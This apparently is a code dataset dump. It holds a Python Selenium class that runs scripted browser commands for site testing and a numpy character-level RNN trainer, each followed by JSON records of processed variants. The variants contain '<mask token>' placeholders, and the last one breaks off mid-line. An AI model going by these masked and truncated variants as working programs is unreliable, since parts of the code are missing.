if not (list_of_commands[i][1] and (list_length == 2)):
status = "SLEEP time not provided"+" in line number "+ line_no
self._print_(print_prefix + status)
custom_exit()
if command_name == 'EXIT':
if list_length != 1:
status = "Exit syntax error"+" in line number "+ line_no
self._print_(print_prefix + status)
custom_exit()
return True
def feed_input(self, input_commands):
print_prefix='feed_input\t'
self.data_dict = {}
#if self.developer_mode: self._print_(self.browser.page_source)
if isinstance(input_commands,str):
with open(input_commands, "r") as fopen:
self.base_list_of_lists = []
self.command_list = fopen.readlines()
for each_line in self.command_list:
self.base_list_of_lists.append((each_line.replace("\n", "")).split("\t"))
elif isinstance(input_commands,list):
self.base_list_of_lists=input_commands
else:
self._print_(print_prefix + ' Input argument should be either string(filename) or list(commands). Passed:' + str(type(input_commands)))
custom_exit()
input_status=self.validate_input_commands(self.base_list_of_lists)
if self.developer_mode and input_status:
self._print_(print_prefix + 'Input is Valid')
return True
def run(self):
if not self.ins_browser:
if not self.browser:
self.browser = webdriver.PhantomJS()#Chrome()
else:
self.browser=self.ins_browser
i = 0
for each_list in self.base_list_of_lists:
if self.developer_mode:
self._print_('Input:\t' + str(i + 1) + '\t' + str(each_list))
line = '\t'.join(each_list)
if each_list[0] == 'GO':
try:
status = self.go(each_list)
if self.developer_mode: self._print_('Command:\tGO\tStatus\t' + str(status))
self.file_write(line, status)
if status == 'Not available':
return 'Not available'
except Exception as e:
self.file_write(line, str(e))
return str(e)
elif each_list[0] == 'GET_VALUE':
try:
status = self.get_value(each_list)
if self.developer_mode: self._print_('Command:\tGET_VALUE\tStatus\t' + str(status))
self.file_write(line, status)
except Exception as e:
self.file_write(line, str(e))
return str(e)
elif each_list[0] == 'GET_VALUES':
# self._print_(self.browser.page_source.encode('utf-8')
try:
status = self.get_values(each_list)
if self.developer_mode: self._print_('Command:\tGET_VALUES\tStatus\t' + str(status))
self.file_write(line, status)
except Exception as e:
self.file_write(line, str(e))
return str(e)
elif each_list[0] == 'GET_LINKS':
try:
self.file_write(line, "Links as below")
status = self.get_links(each_list)
if self.developer_mode: self._print_('Command:\tGET_LINKS\tStatus\t' + str(status))
except Exception as e:
self.file_write(line, str(e))
return str(e)
elif each_list[0] == 'CLICK':
try:
status = self.click(each_list)
if self.developer_mode: self._print_('Command:\tCLICK\tStatus\t' + str(status))
self.file_write(line, status)
if status == 'Not available':
return 'Not available'
except Exception as e:
self.file_write(line, str(e))
return str(e)
elif each_list[0] == 'ENTER_VALUE':
try:
status = self.enter_value(each_list)
if self.developer_mode: self._print_('Command:\tENTER_VALUE\tStatus\t' + str(status))
self.file_write(line, status)
if status == 'Not available':
return 'Not available'
except Exception as e:
self.file_write(line, str(e))
return str(e)
elif each_list[0] == 'SLEEP':
self.sleep(each_list[1])
status = "Slept for " + each_list[1] + " second(s)"
if self.developer_mode: self._print_('Command:\tSLEEP\tStatus\t' + str(status))
self.file_write(line, status)
elif each_list[0] == 'EXIT':
self.file_write("EXIT", "OK")
if self.developer_mode: self._print_('Command:\tEXIT')
self.browser.quit()
i += 1
def go(self, list_of_values):
self.browser.get(list_of_values[1])
r = requests.get(list_of_values[1])
time.sleep(2)
link_status = r.status_code
return link_status
def close(self):
if not self.ins_browser:
if self.browser:
self.browser.quit()
def click(self, list_of_values):
try:
if list_of_values[1] == 'ID':
a_obj = self.find_by_id(list_of_values[2])
elif list_of_values[1] == 'XPATH':
a_obj = self.find_by_xpath(list_of_values[2])
elif list_of_values[1] == 'NAME':
a_obj = self.find_by_name(list_of_values[2])
elif list_of_values[1] == 'CLASS':
a_obj = self.find_by_class(list_of_values[2])
if len(list_of_values) == 3:
a_obj.click()
return "OK"
elif len(list_of_values) > 3:
if list_of_values[4] == 'Available':
if list_of_values[3] in self.data_dict.keys():
a_obj.click()
return "OK"
else:
return "Not available"
elif list_of_values[4] == 'Not Available':
if list_of_values[3] not in self.data_dict.keys():
a_obj.click()
self._print_('Function:\tclick\tCondition:\t' + 'Available')
return "OK"
else:
return "Not available"
else:
if list_of_values[4] == self.data_dict[list_of_values[3]]:
a_obj.click()
return "OK"
else:
return "Not available"
except NoSuchElementException as e:
self._print_('Function:\tclick\tError:\t' + str(e) + '\t Input:' + str(list_of_values))
return "Not available"
def get_value(self, list_of_values):
if list_of_values[1] == 'ID':
a_obj = self.find_by_id(list_of_values[2])
elif list_of_values[1] == 'XPATH':
a_obj = self.find_by_xpath(list_of_values[2])
elif list_of_values[1] == 'NAME':
a_obj = self.find_by_name(list_of_values[2])
if a_obj:
self.data_dict[list_of_values[3]] = a_obj.text
if self.developer_mode: self._print_('Function\tget_value\tData:\t' + str(self.data_dict))
return a_obj.text
return "Not available"
def get_values(self, list_of_values):
edge_list = []
new_news_list = []
if list_of_values[1] == 'CLASS':
elements = self.find_by_css_selector(list_of_values[2])
elif list_of_values[1] == 'XPATH':
elements = self.find_by_xpath(list_of_values[2])
elif list_of_values[1] == 'NAME':
elements = self.find_by_name(list_of_values[2])
elif list_of_values[1] == 'CSS':
elements = self.find_by_css_selector(list_of_values[2])
if elements:
edge_list = [a.get_attribute("href") for a in elements]
for each in edge_list:
if each and (not each.startswith('mailto')) and each not in new_news_list:
new_news_list.append(each)
return new_news_list
def get_links(self, list_of_values):
edge_list = []
new_news_list = []
if list_of_values[1] == 'CLASS':
path = "div."+list_of_values[2]+" a"
elements = self.find_by_css_selector(path)
elif list_of_values[1] == 'ID':
path = "div#"+list_of_values[2]+" a"
elements = self.find_by_css_selector(path)
if elements:
edge_list = [a.get_attribute("href") for a in elements]
for each in edge_list:
if each and (not each.startswith('mailto')) and each not in new_news_list:
new_news_list.append(each)
if new_news_list: #do we need to check the 4th argument
self.data_dict[list_of_values[3]]=new_news_list
main_window = self.browser.current_window_handle
if self.developer_mode: self._print_('Function\tget_links\tData:\t' + str(new_news_list))
self.file_write("",str(len(new_news_list))+ " link(s) found. Their status are: (link"+"\t"+"is_url_active"+"\t"+"is_redirected"+"\t"+"redirected_to"+")")
for each_link in new_news_list:
res_dict = url_check_status(each_link)
line = each_link+"\t"+res_dict['URL_Active']+"\t"+res_dict['Redirected']
self.file_write(line, res_dict['Redirected_into'])
return new_news_list
def enter_value(self, list_of_values):
if list_of_values[1] == 'ID':
a_obj = self.find_by_id(list_of_values[2])
elif list_of_values[1] == 'XPATH':
a_obj = self.find_by_xpath(list_of_values[2])
elif list_of_values[1] == 'NAME':
a_obj = self.find_by_name(list_of_values[2])
if a_obj:
if list_of_values[3] == "Keys.ENTER":
a_obj.send_keys(Keys.ENTER)
else:
a_obj.send_keys(list_of_values[3])
return "Value entered"
return "Not available"
def sleep(self, sleep_time):
time.sleep(float(sleep_time))
return True
def find_by_id(self, input_id):
input_id_obj = self.browser.find_element_by_id(input_id)
return input_id_obj
def find_elements_by_id(self, input_id):
input_id_obj = self.browser.find_elements_by_id(input_id)
return input_id_obj
def find_by_xpath(self, input_xpath):
input_xpath_obj = self.browser.find_element_by_xpath(input_xpath)
return input_xpath_obj
def find_by_name(self, input_name):
input_id_obj = self.browser.find_element_by_name(input_name)
return input_id_obj
def find_by_class(self, input_name):
input_class_obj = self.browser.find_element_by_class_name(input_name)
return input_class_obj
def find_by_css_selector(self, input_name):
input_class_obj = self.browser.find_elements_by_css_selector(input_name)
return input_class_obj
def file_write(self, command_line, status):
if self.write_output:
with open(self.output_filename, "a") as result_file:
result_file.write(command_line + "\t" + str(status) + "\n")
def get_data_dictionary(self):
return self.data_dict
if __name__ == '__main__':
# input_filename = 'input.txt'
input_filename = 'input_22.txt'
output_filename = 'output.txt'
obj = PatternScraping(developer_mode=True)
obj.feed_input([['GO','https://www.google.com'],['SLEEP','1'],['ENTER_VALUE','ID','lst-ib','Testing Automation'],['CLICK','NAME','btnG'],['SLEEP','5'],['EXIT']])
obj.run()
|
normal
|
{
"blob_id": "9e77385933cf6e381f25bea9020f909d5dc6817d",
"index": 4744,
"step-1": "# -*- coding: utf-8 -*-\n\"\"\"\n Description: This modules is used for testing. Testing is performed based on the list of commands given to perform in a website\n Version : v1.5\n History :\n v1.0 - 08/01/2016 - Initial version\n v1.1 - 08/05/2016 - Modified to accept List input.\n v1.2 - 08/05/2016 - Removed dead code in feed_input\n v1.3 - 08/05/2016 - Added function get_data_dictionary to return the fetched values\n v1.4 - 09/01/2016 - updated _print_ function and added log_process_status variable\n v1.5 - 09/22/2016 - variable to suppress output running. Default - output will be written to file.\n Open Issues: None.\n Pending : Enhance coding standards. Clean up dead code in feed_input function\n\"\"\"\n__version__ = \"1.0.0\"\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.keys import Keys\nfrom URL_Status import *\nimport time # for sleep\nimport requests #to check status of the page\nfrom Utilities import *\nclass PatternScraping():\n\n def __init__(self,output_filename=None,developer_mode=False,print_instance=None,browser_instance=None,log_process_status=True,write_output=True):\n self.developer_mode = developer_mode\n self.log_process_status=log_process_status\n if output_filename:\n self.output_filename=output_filename\n else:\n self.output_filename='PatternScraping.' + get_timestamp_for_file() + '.testing.txt'\n self.write_output=write_output\n self.possible_commands = ['GO', 'GET_VALUE', 'CLICK', 'ENTER_VALUE','EXIT', 'SLEEP', 'GET_VALUES','GET_LINKS']\n self.possible_command_types = ['ID', 'XPATH', 'NAME', 'CLASS', 'CSS']\n self.browser = None\n self.ins_browser=browser_instance\n self.initiate_print_instance(instance_instance=print_instance)\n\n def _print_(self,input_string_in,skip_timestamp=False,add_leading_space=True,message_priority=''):\n module_name='PatternScraping'\n input_string=input_string_in\n if isinstance(input_string,str):\n input_string = get_html_to_unicode_string(input_string)\n if self.print_instance:\n self.print_instance.customPrint(input_string,skip_timestamp=skip_timestamp,add_leading_space=add_leading_space,module_name=module_name,message_priority=message_priority)\n else:\n print_string=u'' + module_name + '\\t' + message_priority + '\\t' + input_string\n if not skip_timestamp:\n print_string = log_time_stamp() + print_string\n print get_printable_string(print_string)\n def initiate_print_instance(self,instance_instance=None):\n self.print_instance=None\n if instance_instance:\n try:\n if instance_instance.check():\n self.print_instance=instance_instance\n return True\n except: \n return False \n return False\n def validate_input_commands(self,list_of_commands):#commands have tupple\n print_prefix='validate_input_commands\\t'\n for i in range(len(list_of_commands)):\n if self.developer_mode:\n self._print_(print_prefix + 'Current Input:' + str(list_of_commands[i]))\n if list_of_commands[i][0] not in self.possible_commands:\n self._print_(print_prefix + 'Command not in list:' + str(list_of_commands[i][0]))\n custom_exit()\n line_no = str(i + 1)\n list_length = len(list_of_commands[i])\n command_name=list_of_commands[i][0]\n if command_name not in ['GO','SLEEP','EXIT'] and list_of_commands[i][1] not in self.possible_command_types:\n status=\"Unknown command type\"+\" in line number \"+ line_no\n self._print_(print_prefix + status)\n custom_exit()\n if command_name == 'GO':\n if not list_of_commands[i][1]:\n status = \"no link provided\" + \" in line number \"+ line_no\n self._print_(print_prefix + status)\n custom_exit()\n if command_name == 'GET_VALUE':\n if list_length != 4 or any(list_of_commands[i]) is False:\n status = \"no data provided\"+\" in line number \"+ line_no\n self._print_(print_prefix + status)\n custom_exit()\n if command_name == 'GET_VALUES':\n if list_length != 4 or any(list_of_commands[i]) is False:\n status = \"no link provided\"+\" in line number \"+ line_no\n self._print_(print_prefix + status)\n custom_exit()\n if command_name == 'CLICK':\n if list_length != 3 and list_length != 5:\n status = \"click command length error \"+\" in line number \"+ line_no\n self._print_(print_prefix + status)\n custom_exit()\n if any(list_of_commands[i]) is False:\n status = \"click syntax error\"+\" in line number \"+ line_no\n self._print_(print_prefix + status)\n custom_exit()\n if command_name == 'ENTER_VALUE':\n if not (list_length == 4 and list_of_commands[i][2]\n and list_of_commands[i][3]):\n status = \"ENTER VALUE syntax error\"+\" in line number \"+ line_no\n self._print_(print_prefix + status)\n custom_exit()\n if command_name == 'SLEEP':\n if not (list_of_commands[i][1] and (list_length == 2)):\n status = \"SLEEP time not provided\"+\" in line number \"+ line_no\n self._print_(print_prefix + status)\n custom_exit()\n if command_name == 'EXIT':\n if list_length != 1:\n status = \"Exit syntax error\"+\" in line number \"+ line_no\n self._print_(print_prefix + status)\n custom_exit()\n return True\n def feed_input(self, input_commands):\n print_prefix='feed_input\\t'\n self.data_dict = {}\n #if self.developer_mode: self._print_(self.browser.page_source)\n if isinstance(input_commands,str):\n with open(input_commands, \"r\") as fopen:\n self.base_list_of_lists = []\n self.command_list = fopen.readlines()\n for each_line in self.command_list:\n self.base_list_of_lists.append((each_line.replace(\"\\n\", \"\")).split(\"\\t\"))\n elif isinstance(input_commands,list):\n self.base_list_of_lists=input_commands\n else:\n self._print_(print_prefix + ' Input argument should be either string(filename) or list(commands). Passed:' + str(type(input_commands)))\n custom_exit()\n input_status=self.validate_input_commands(self.base_list_of_lists)\n if self.developer_mode and input_status:\n self._print_(print_prefix + 'Input is Valid')\n return True\n\n def run(self):\n if not self.ins_browser:\n if not self.browser:\n self.browser = webdriver.PhantomJS()#Chrome()\n else:\n self.browser=self.ins_browser\n i = 0\n for each_list in self.base_list_of_lists:\n if self.developer_mode: \n self._print_('Input:\\t' + str(i + 1) + '\\t' + str(each_list))\n line = '\\t'.join(each_list)\n if each_list[0] == 'GO':\n try:\n status = self.go(each_list)\n if self.developer_mode: self._print_('Command:\\tGO\\tStatus\\t' + str(status))\n self.file_write(line, status)\n if status == 'Not available':\n return 'Not available'\n except Exception as e:\n self.file_write(line, str(e))\n return str(e)\n elif each_list[0] == 'GET_VALUE':\n try:\n status = self.get_value(each_list)\n if self.developer_mode: self._print_('Command:\\tGET_VALUE\\tStatus\\t' + str(status))\n self.file_write(line, status)\n except Exception as e:\n self.file_write(line, str(e))\n return str(e)\n elif each_list[0] == 'GET_VALUES':\n # self._print_(self.browser.page_source.encode('utf-8')\n try:\n status = self.get_values(each_list)\n if self.developer_mode: self._print_('Command:\\tGET_VALUES\\tStatus\\t' + str(status)) \n self.file_write(line, status)\n except Exception as e:\n self.file_write(line, str(e))\n return str(e)\n elif each_list[0] == 'GET_LINKS':\n try:\n self.file_write(line, \"Links as below\")\n status = self.get_links(each_list)\n if self.developer_mode: self._print_('Command:\\tGET_LINKS\\tStatus\\t' + str(status))\n except Exception as e:\n self.file_write(line, str(e))\n return str(e)\n elif each_list[0] == 'CLICK':\n try:\n status = self.click(each_list) \n if self.developer_mode: self._print_('Command:\\tCLICK\\tStatus\\t' + str(status))\n self.file_write(line, status)\n if status == 'Not available':\n return 'Not available'\n except Exception as e:\n self.file_write(line, str(e))\n return str(e)\n elif each_list[0] == 'ENTER_VALUE':\n try:\n status = self.enter_value(each_list)\n if self.developer_mode: self._print_('Command:\\tENTER_VALUE\\tStatus\\t' + str(status))\n self.file_write(line, status)\n if status == 'Not available':\n return 'Not available'\n except Exception as e:\n self.file_write(line, str(e))\n return str(e)\n elif each_list[0] == 'SLEEP':\n self.sleep(each_list[1])\n status = \"Slept for \" + each_list[1] + \" second(s)\"\n if self.developer_mode: self._print_('Command:\\tSLEEP\\tStatus\\t' + str(status))\n self.file_write(line, status)\n elif each_list[0] == 'EXIT':\n self.file_write(\"EXIT\", \"OK\")\n if self.developer_mode: self._print_('Command:\\tEXIT')\n self.browser.quit()\n i += 1\n\n def go(self, list_of_values):\n self.browser.get(list_of_values[1])\n r = requests.get(list_of_values[1])\n time.sleep(2)\n link_status = r.status_code\n return link_status\n def close(self):\n if not self.ins_browser:\n if self.browser:\n self.browser.quit()\n def click(self, list_of_values):\n try:\n if list_of_values[1] == 'ID':\n a_obj = self.find_by_id(list_of_values[2])\n elif list_of_values[1] == 'XPATH':\n a_obj = self.find_by_xpath(list_of_values[2])\n elif list_of_values[1] == 'NAME':\n a_obj = self.find_by_name(list_of_values[2])\n elif list_of_values[1] == 'CLASS':\n a_obj = self.find_by_class(list_of_values[2])\n if len(list_of_values) == 3:\n a_obj.click()\n return \"OK\"\n elif len(list_of_values) > 3:\n if list_of_values[4] == 'Available':\n if list_of_values[3] in self.data_dict.keys():\n a_obj.click()\n return \"OK\"\n else:\n return \"Not available\"\n elif list_of_values[4] == 'Not Available':\n if list_of_values[3] not in self.data_dict.keys():\n a_obj.click()\n self._print_('Function:\\tclick\\tCondition:\\t' + 'Available')\n return \"OK\"\n else:\n return \"Not available\"\n else:\n if list_of_values[4] == self.data_dict[list_of_values[3]]:\n a_obj.click()\n return \"OK\"\n else:\n return \"Not available\"\n except NoSuchElementException as e:\n self._print_('Function:\\tclick\\tError:\\t' + str(e) + '\\t Input:' + str(list_of_values))\n return \"Not available\"\n\n def get_value(self, list_of_values):\n if list_of_values[1] == 'ID':\n a_obj = self.find_by_id(list_of_values[2])\n elif list_of_values[1] == 'XPATH':\n a_obj = self.find_by_xpath(list_of_values[2])\n elif list_of_values[1] == 'NAME':\n a_obj = self.find_by_name(list_of_values[2])\n if a_obj:\n self.data_dict[list_of_values[3]] = a_obj.text\n if self.developer_mode: self._print_('Function\\tget_value\\tData:\\t' + str(self.data_dict))\n return a_obj.text\n return \"Not available\"\n\n def get_values(self, list_of_values):\n edge_list = []\n new_news_list = []\n if list_of_values[1] == 'CLASS':\n elements = self.find_by_css_selector(list_of_values[2])\n elif list_of_values[1] == 'XPATH':\n elements = self.find_by_xpath(list_of_values[2])\n elif list_of_values[1] == 'NAME':\n elements = self.find_by_name(list_of_values[2])\n elif list_of_values[1] == 'CSS':\n elements = self.find_by_css_selector(list_of_values[2])\n if elements:\n edge_list = [a.get_attribute(\"href\") for a in elements] \n for each in edge_list:\n if each and (not each.startswith('mailto')) and each not in new_news_list:\n new_news_list.append(each)\n return new_news_list\n\n def get_links(self, list_of_values):\n edge_list = []\n new_news_list = []\n if list_of_values[1] == 'CLASS':\n path = \"div.\"+list_of_values[2]+\" a\"\n elements = self.find_by_css_selector(path)\n elif list_of_values[1] == 'ID':\n path = \"div#\"+list_of_values[2]+\" a\"\n elements = self.find_by_css_selector(path)\n if elements: \n edge_list = [a.get_attribute(\"href\") for a in elements] \n for each in edge_list:\n if each and (not each.startswith('mailto')) and each not in new_news_list:\n new_news_list.append(each)\n if new_news_list: #do we need to check the 4th argument\n self.data_dict[list_of_values[3]]=new_news_list\n main_window = self.browser.current_window_handle \n if self.developer_mode: self._print_('Function\\tget_links\\tData:\\t' + str(new_news_list))\n self.file_write(\"\",str(len(new_news_list))+ \" link(s) found. Their status are: (link\"+\"\\t\"+\"is_url_active\"+\"\\t\"+\"is_redirected\"+\"\\t\"+\"redirected_to\"+\")\")\n for each_link in new_news_list:\n res_dict = url_check_status(each_link)\n line = each_link+\"\\t\"+res_dict['URL_Active']+\"\\t\"+res_dict['Redirected']\n self.file_write(line, res_dict['Redirected_into']) \n return new_news_list\n \n def enter_value(self, list_of_values):\n if list_of_values[1] == 'ID':\n a_obj = self.find_by_id(list_of_values[2])\n elif list_of_values[1] == 'XPATH':\n a_obj = self.find_by_xpath(list_of_values[2])\n elif list_of_values[1] == 'NAME':\n a_obj = self.find_by_name(list_of_values[2]) \n if a_obj:\n if list_of_values[3] == \"Keys.ENTER\":\n a_obj.send_keys(Keys.ENTER)\n else:\n a_obj.send_keys(list_of_values[3])\n return \"Value entered\"\n return \"Not available\"\n\n def sleep(self, sleep_time):\n time.sleep(float(sleep_time))\n return True\n\n def find_by_id(self, input_id):\n input_id_obj = self.browser.find_element_by_id(input_id)\n return input_id_obj\n \n def find_elements_by_id(self, input_id):\n input_id_obj = self.browser.find_elements_by_id(input_id)\n return input_id_obj\n\n def find_by_xpath(self, input_xpath):\n input_xpath_obj = self.browser.find_element_by_xpath(input_xpath)\n return input_xpath_obj\n\n def find_by_name(self, input_name):\n input_id_obj = self.browser.find_element_by_name(input_name)\n return input_id_obj\n \n def find_by_class(self, input_name):\n input_class_obj = self.browser.find_element_by_class_name(input_name)\n return input_class_obj\n \n def find_by_css_selector(self, input_name):\n input_class_obj = self.browser.find_elements_by_css_selector(input_name)\n return input_class_obj\n\n def file_write(self, command_line, status):\n if self.write_output:\n with open(self.output_filename, \"a\") as result_file:\n result_file.write(command_line + \"\\t\" + str(status) + \"\\n\")\n def get_data_dictionary(self):\n return self.data_dict\n\nif __name__ == '__main__':\n # input_filename = 'input.txt'\n input_filename = 'input_22.txt'\n output_filename = 'output.txt'\n obj = PatternScraping(developer_mode=True)\n obj.feed_input([['GO','https://www.google.com'],['SLEEP','1'],['ENTER_VALUE','ID','lst-ib','Testing Automation'],['CLICK','NAME','btnG'],['SLEEP','5'],['EXIT']])\n obj.run()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import numpy as np
# data I/O
data = open('input.txt', 'r').read() # should be simple plain text file
chars = list(set(data))
data_size, vocab_size = len(data), len(chars)
print("chars: ", chars)
#one-hot encoding
char_to_ix = { ch:i for i,ch in enumerate(chars) }
ix_to_char = { i:ch for i,ch in enumerate(chars) }
iteration=50000
hidden_size = 100
seq_length = 25
learning_rate = 1e-1
# model parameters
U = np.random.randn(hidden_size, vocab_size)*0.01 # input to hidden
W = np.random.randn(hidden_size, hidden_size)*0.01 # hidden to hidden
V = np.random.randn(vocab_size, hidden_size)*0.01 # hidden to output
bh = np.zeros((hidden_size, 1)) # hidden bias
by = np.zeros((vocab_size, 1)) # output bias
def lossFun(inputs, targets, hprev):
x, h, yprime = {}, {}, {}
h[-1] = np.copy(hprev)
loss = 0
# forward pass
for t in range(len(inputs)):
x[t] = np.zeros((vocab_size,1))
x[t][inputs[t]] = 1 # encode-1ofk representation
h[t] = np.tanh(np.dot(U, x[t]) + np.dot(W, h[t-1]) + bh)
temp=np.dot(V, h[t]) + by
yprime[t] = np.exp(temp) / np.sum(np.exp(temp))
loss += -np.log(yprime[t][targets[t],0]) # softmax (cross-entropy loss) for 1-of-k representaiton
# backprop
dU, dW, dV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)
dbh, dby = np.zeros_like(bh), np.zeros_like(by)
dhnext = np.zeros_like(h[0])
for t in reversed(range(len(inputs))):
dy = np.copy(yprime[t])
dy[targets[t]] -= 1 # backprop into y. http://cs231n.github.io/neural-networks-case-study/#grad
dV += np.dot(dy, h[t].T)
dby += dy
dh = np.dot(V.T, dy) + dhnext # backprop into h
dhraw = (1 - h[t] * h[t]) * dh # backprop through tanh nonlinearity
dbh += dhraw
dU += np.dot(dhraw, x[t].T)
dW += np.dot(dhraw, h[t-1].T)
dhnext = np.dot(W.T, dhraw)
for dparam in [dU, dW, dV, dbh, dby]:
np.clip(dparam, -5, 5, out=dparam) # clip to mitigate exploding gradients
return loss, dU, dW, dV, dbh, dby, h[len(inputs)-1]
n, p = 0, 0
mU, mW, mV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)
mbh, mby = np.zeros_like(bh), np.zeros_like(by) # memory variables for Adagrad
smooth_loss = -np.log(1.0/vocab_size)*seq_length # loss at iteration 0
for n in range(iteration):
if p+seq_length+1 >= len(data) or n == 0:
hprev = np.zeros((hidden_size,1)) # reset RNN memory
p = 0
inputs = [char_to_ix[ch] for ch in data[p:p+seq_length]]
targets = [char_to_ix[ch] for ch in data[p+1:p+seq_length+1]]
loss, dU, dW, dV, dbh, dby, hprev = lossFun(inputs, targets, hprev)
smooth_loss = smooth_loss * 0.999 + loss * 0.001
if n % 100 == 0:
print (n,smooth_loss)
# perform parameter update with Adagrad
# for param, dparam, mem in zip([U, W, V, bh, by],
# [dU, dW, dV, dbh, dby],
# [mU, mW, mV, mbh, mby]):
# mem += dparam * dparam
# param += -learning_rate * dparam / np.sqrt(mem + 1e-8) # adagrad update
param=[U, W, V, bh, by]
dparam=[dU, dW, dV, dbh, dby]
mem=[mU, mW, mV, mbh, mby]
for i in range(len(param)):
mem[i] += dparam[i] * dparam[i]
param[i] += -learning_rate * dparam[i] / np.sqrt(mem[i] + 1e-8) # adagrad update
p += seq_length # move data pointer
# n += 1 # iteration counter
# if n>iteration:
# print("done")
# sys.exit(0)
|
normal
|
{
"blob_id": "d988cfebeec37df700f46bbb027a4980ba624d30",
"index": 6639,
"step-1": "<mask token>\n\n\ndef lossFun(inputs, targets, hprev):\n x, h, yprime = {}, {}, {}\n h[-1] = np.copy(hprev)\n loss = 0\n for t in range(len(inputs)):\n x[t] = np.zeros((vocab_size, 1))\n x[t][inputs[t]] = 1\n h[t] = np.tanh(np.dot(U, x[t]) + np.dot(W, h[t - 1]) + bh)\n temp = np.dot(V, h[t]) + by\n yprime[t] = np.exp(temp) / np.sum(np.exp(temp))\n loss += -np.log(yprime[t][targets[t], 0])\n dU, dW, dV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)\n dbh, dby = np.zeros_like(bh), np.zeros_like(by)\n dhnext = np.zeros_like(h[0])\n for t in reversed(range(len(inputs))):\n dy = np.copy(yprime[t])\n dy[targets[t]] -= 1\n dV += np.dot(dy, h[t].T)\n dby += dy\n dh = np.dot(V.T, dy) + dhnext\n dhraw = (1 - h[t] * h[t]) * dh\n dbh += dhraw\n dU += np.dot(dhraw, x[t].T)\n dW += np.dot(dhraw, h[t - 1].T)\n dhnext = np.dot(W.T, dhraw)\n for dparam in [dU, dW, dV, dbh, dby]:\n np.clip(dparam, -5, 5, out=dparam)\n return loss, dU, dW, dV, dbh, dby, h[len(inputs) - 1]\n\n\n<mask token>\n",
"step-2": "<mask token>\nprint('chars: ', chars)\n<mask token>\n\n\ndef lossFun(inputs, targets, hprev):\n x, h, yprime = {}, {}, {}\n h[-1] = np.copy(hprev)\n loss = 0\n for t in range(len(inputs)):\n x[t] = np.zeros((vocab_size, 1))\n x[t][inputs[t]] = 1\n h[t] = np.tanh(np.dot(U, x[t]) + np.dot(W, h[t - 1]) + bh)\n temp = np.dot(V, h[t]) + by\n yprime[t] = np.exp(temp) / np.sum(np.exp(temp))\n loss += -np.log(yprime[t][targets[t], 0])\n dU, dW, dV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)\n dbh, dby = np.zeros_like(bh), np.zeros_like(by)\n dhnext = np.zeros_like(h[0])\n for t in reversed(range(len(inputs))):\n dy = np.copy(yprime[t])\n dy[targets[t]] -= 1\n dV += np.dot(dy, h[t].T)\n dby += dy\n dh = np.dot(V.T, dy) + dhnext\n dhraw = (1 - h[t] * h[t]) * dh\n dbh += dhraw\n dU += np.dot(dhraw, x[t].T)\n dW += np.dot(dhraw, h[t - 1].T)\n dhnext = np.dot(W.T, dhraw)\n for dparam in [dU, dW, dV, dbh, dby]:\n np.clip(dparam, -5, 5, out=dparam)\n return loss, dU, dW, dV, dbh, dby, h[len(inputs) - 1]\n\n\n<mask token>\nfor n in range(iteration):\n if p + seq_length + 1 >= len(data) or n == 0:\n hprev = np.zeros((hidden_size, 1))\n p = 0\n inputs = [char_to_ix[ch] for ch in data[p:p + seq_length]]\n targets = [char_to_ix[ch] for ch in data[p + 1:p + seq_length + 1]]\n loss, dU, dW, dV, dbh, dby, hprev = lossFun(inputs, targets, hprev)\n smooth_loss = smooth_loss * 0.999 + loss * 0.001\n if n % 100 == 0:\n print(n, smooth_loss)\n param = [U, W, V, bh, by]\n dparam = [dU, dW, dV, dbh, dby]\n mem = [mU, mW, mV, mbh, mby]\n for i in range(len(param)):\n mem[i] += dparam[i] * dparam[i]\n param[i] += -learning_rate * dparam[i] / np.sqrt(mem[i] + 1e-08)\n p += seq_length\n",
"step-3": "<mask token>\ndata = open('input.txt', 'r').read()\nchars = list(set(data))\ndata_size, vocab_size = len(data), len(chars)\nprint('chars: ', chars)\nchar_to_ix = {ch: i for i, ch in enumerate(chars)}\nix_to_char = {i: ch for i, ch in enumerate(chars)}\niteration = 50000\nhidden_size = 100\nseq_length = 25\nlearning_rate = 0.1\nU = np.random.randn(hidden_size, vocab_size) * 0.01\nW = np.random.randn(hidden_size, hidden_size) * 0.01\nV = np.random.randn(vocab_size, hidden_size) * 0.01\nbh = np.zeros((hidden_size, 1))\nby = np.zeros((vocab_size, 1))\n\n\ndef lossFun(inputs, targets, hprev):\n x, h, yprime = {}, {}, {}\n h[-1] = np.copy(hprev)\n loss = 0\n for t in range(len(inputs)):\n x[t] = np.zeros((vocab_size, 1))\n x[t][inputs[t]] = 1\n h[t] = np.tanh(np.dot(U, x[t]) + np.dot(W, h[t - 1]) + bh)\n temp = np.dot(V, h[t]) + by\n yprime[t] = np.exp(temp) / np.sum(np.exp(temp))\n loss += -np.log(yprime[t][targets[t], 0])\n dU, dW, dV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)\n dbh, dby = np.zeros_like(bh), np.zeros_like(by)\n dhnext = np.zeros_like(h[0])\n for t in reversed(range(len(inputs))):\n dy = np.copy(yprime[t])\n dy[targets[t]] -= 1\n dV += np.dot(dy, h[t].T)\n dby += dy\n dh = np.dot(V.T, dy) + dhnext\n dhraw = (1 - h[t] * h[t]) * dh\n dbh += dhraw\n dU += np.dot(dhraw, x[t].T)\n dW += np.dot(dhraw, h[t - 1].T)\n dhnext = np.dot(W.T, dhraw)\n for dparam in [dU, dW, dV, dbh, dby]:\n np.clip(dparam, -5, 5, out=dparam)\n return loss, dU, dW, dV, dbh, dby, h[len(inputs) - 1]\n\n\nn, p = 0, 0\nmU, mW, mV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)\nmbh, mby = np.zeros_like(bh), np.zeros_like(by)\nsmooth_loss = -np.log(1.0 / vocab_size) * seq_length\nfor n in range(iteration):\n if p + seq_length + 1 >= len(data) or n == 0:\n hprev = np.zeros((hidden_size, 1))\n p = 0\n inputs = [char_to_ix[ch] for ch in data[p:p + seq_length]]\n targets = [char_to_ix[ch] for ch in data[p + 1:p + seq_length + 1]]\n loss, dU, dW, dV, dbh, dby, hprev = lossFun(inputs, targets, hprev)\n smooth_loss = smooth_loss * 0.999 + loss * 0.001\n if n % 100 == 0:\n print(n, smooth_loss)\n param = [U, W, V, bh, by]\n dparam = [dU, dW, dV, dbh, dby]\n mem = 